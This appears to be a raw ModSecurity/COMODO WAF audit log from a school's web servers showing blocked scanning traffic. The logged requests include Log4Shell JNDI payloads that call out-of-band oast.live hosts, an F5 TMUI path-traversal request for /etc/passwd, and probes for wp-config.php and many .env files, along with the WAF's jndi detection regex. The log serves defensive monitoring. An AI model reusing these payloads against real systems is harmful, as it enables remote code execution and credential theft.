${jndi:ldap://${:-280}${:-987}.${hostName}.cookiename.d0qa44pgpeoi1bmoheagk8d9zh7nzxdna.oast.live}=${jndi:ldap://${:-280}${:-987}.${hostName}.cookievalue.d0qa44pgpeoi1bmoheagge1w6q1b7c9cc.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164577974 --f0e6641c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f0e6641c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748323737404994 5214 (- - -) Stopwatch2: 1748323737404994 5214; combined=3665, p1=457, p2=3177, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f0e6641c-Z-- --4d69406c-A-- [27/May/2025:12:55:48 +0700] aDVT5N6cNBpj1JOkpQlZfwAAAEk 103.236.140.4 42258 103.236.140.4 8181 --4d69406c-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 174.138.19.18 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 174.138.19.18 Accept-Encoding: gzip X-Varnish: 164580217 --4d69406c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4d69406c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748325348315126 724 (- - -) Stopwatch2: 1748325348315126 724; combined=298, p1=265, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d69406c-Z-- --4e321305-A-- [27/May/2025:12:55:48 +0700] aDVT5N6cNBpj1JOkpQlZgAAAAEU 103.236.140.4 42490 103.236.140.4 8181 --4e321305-B-- GET /wp-config.php HTTP/1.1 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 174.138.19.18 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Cookie: X-Forwarded-For: 174.138.19.18 Accept-Encoding: gzip X-Varnish: 160762815 --4e321305-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4e321305-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748325348338663 661 (- - -) Stopwatch2: 1748325348338663 661; combined=256, p1=223, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4e321305-Z-- --9c4ca479-A-- [27/May/2025:12:58:55 +0700] aDVUn2TuEZUBy5rh0saJUQAAAA8 103.236.140.4 42868 103.236.140.4 8181 --9c4ca479-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160588017 --9c4ca479-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9c4ca479-E-- --9c4ca479-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748325535880083 1491 (- - -) Stopwatch2: 1748325535880083 1491; combined=459, p1=345, p2=88, p3=0, p4=0, p5=26, sr=79, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c4ca479-Z-- --33c43f1b-A-- [27/May/2025:12:59:00 +0700] aDVUpGTuEZUBy5rh0saJWAAAABM 103.236.140.4 42868 103.236.140.4 8181 --33c43f1b-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/112.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168511798 --33c43f1b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --33c43f1b-E-- --33c43f1b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748325540402677 2596 (- - -) Stopwatch2: 1748325540402677 2596; combined=643, p1=488, p2=118, p3=0, p4=0, p5=37, sr=80, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33c43f1b-Z-- --5c907560-A-- [27/May/2025:13:07:45 +0700] aDVWsVuSH_Spa4YU2Zm1IQAAANA 103.236.140.4 43194 103.236.140.4 8181 --5c907560-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --5c907560-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c907560-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326065949055 696 (- - -) Stopwatch2: 1748326065949055 696; combined=284, p1=250, p2=0, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c907560-Z-- --79649d16-A-- [27/May/2025:13:07:46 +0700] aDVWshLFq2VRfSzm6b8czwAAAJY 103.236.140.4 43196 103.236.140.4 8181 --79649d16-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --79649d16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79649d16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066131198 746 (- - -) Stopwatch2: 1748326066131198 746; combined=305, p1=254, p2=0, p3=0, p4=0, p5=50, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79649d16-Z-- --0c652026-A-- [27/May/2025:13:07:46 +0700] aDVWsluSH_Spa4YU2Zm1IgAAAM4 103.236.140.4 43198 103.236.140.4 8181 --0c652026-B-- GET /.env.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0c652026-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c652026-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066313260 711 (- - -) Stopwatch2: 1748326066313260 711; combined=260, p1=215, p2=0, p3=0, p4=0, p5=45, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c652026-Z-- --485bba19-A-- [27/May/2025:13:07:46 +0700] aDVWsluSH_Spa4YU2Zm1IwAAANQ 103.236.140.4 43200 103.236.140.4 8181 --485bba19-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --485bba19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --485bba19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066495443 776 (- - -) Stopwatch2: 1748326066495443 776; combined=288, p1=252, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --485bba19-Z-- --96476a1a-A-- [27/May/2025:13:07:46 +0700] aDVWsluSH_Spa4YU2Zm1JAAAANU 103.236.140.4 43202 103.236.140.4 8181 --96476a1a-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --96476a1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --96476a1a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066677960 607 (- - -) Stopwatch2: 1748326066677960 607; combined=217, p1=187, p2=0, p3=0, p4=0, p5=29, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96476a1a-Z-- --27314803-A-- [27/May/2025:13:07:46 +0700] aDVWshLFq2VRfSzm6b8c0AAAAJg 103.236.140.4 43206 103.236.140.4 8181 --27314803-B-- GET /.env.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --27314803-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27314803-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326066860015 786 (- - -) Stopwatch2: 1748326066860015 786; combined=323, p1=288, p2=0, p3=0, p4=0, p5=35, sr=123, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27314803-Z-- --eebdef0d-A-- [27/May/2025:13:07:47 +0700] aDVWs1uSH_Spa4YU2Zm1JgAAAMA 103.236.140.4 43208 103.236.140.4 8181 --eebdef0d-B-- GET /.env.prod HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --eebdef0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eebdef0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067042206 738 (- - -) Stopwatch2: 1748326067042206 738; combined=306, p1=257, p2=0, p3=0, p4=0, p5=49, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eebdef0d-Z-- --c1986663-A-- [27/May/2025:13:07:47 +0700] aDVWs1uSH_Spa4YU2Zm1JwAAANY 103.236.140.4 43210 103.236.140.4 8181 --c1986663-B-- GET /.env.production.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --c1986663-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1986663-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067224255 673 (- - -) Stopwatch2: 1748326067224255 673; combined=253, p1=220, p2=0, p3=0, p4=0, p5=33, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1986663-Z-- --38002955-A-- [27/May/2025:13:07:47 +0700] aDVWs2TuEZUBy5rh0saJYwAAABA 103.236.140.4 43214 103.236.140.4 8181 --38002955-B-- GET /.env.stage HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --38002955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38002955-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067406460 822 (- - -) Stopwatch2: 1748326067406460 822; combined=299, p1=265, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38002955-Z-- --901b9d70-A-- [27/May/2025:13:07:47 +0700] aDVWs1uSH_Spa4YU2Zm1KAAAAME 103.236.140.4 43216 103.236.140.4 8181 --901b9d70-B-- GET /admin/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --901b9d70-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --901b9d70-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067588780 715 (- - -) Stopwatch2: 1748326067588780 715; combined=270, p1=236, p2=0, p3=0, p4=0, p5=34, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --901b9d70-Z-- --289fc805-A-- [27/May/2025:13:07:47 +0700] aDVWs1uSH_Spa4YU2Zm1KQAAANc 103.236.140.4 43218 103.236.140.4 8181 --289fc805-B-- GET /api/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --289fc805-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --289fc805-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067771258 657 (- - -) Stopwatch2: 1748326067771258 657; combined=244, p1=213, p2=0, p3=0, p4=0, p5=31, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --289fc805-Z-- --510b4318-A-- [27/May/2025:13:07:47 +0700] aDVWs2TuEZUBy5rh0saJZAAAAAU 103.236.140.4 43222 103.236.140.4 8181 --510b4318-B-- GET /apps/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --510b4318-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --510b4318-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326067953403 765 (- - -) Stopwatch2: 1748326067953403 765; combined=292, p1=245, p2=0, p3=0, p4=0, p5=46, sr=59, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --510b4318-Z-- --4ed85f67-A-- [27/May/2025:13:07:48 +0700] aDVWtGTuEZUBy5rh0saJZQAAAAY 103.236.140.4 43224 103.236.140.4 8181 --4ed85f67-B-- GET /aws-ses/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 170.39.217.236 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 170.39.217.236 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4ed85f67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ed85f67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748326068135531 536 (- - -) Stopwatch2: 1748326068135531 536; combined=197, p1=164, p2=0, p3=0, p4=0, p5=33, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ed85f67-Z-- --bf427f41-A-- [27/May/2025:14:35:24 +0700] aDVrPFuSH_Spa4YU2Zm1cgAAAMA 103.236.140.4 45538 103.236.140.4 8181 --bf427f41-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0qa44pgpeoi1bmoheagx6qfws73qgjbs.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: 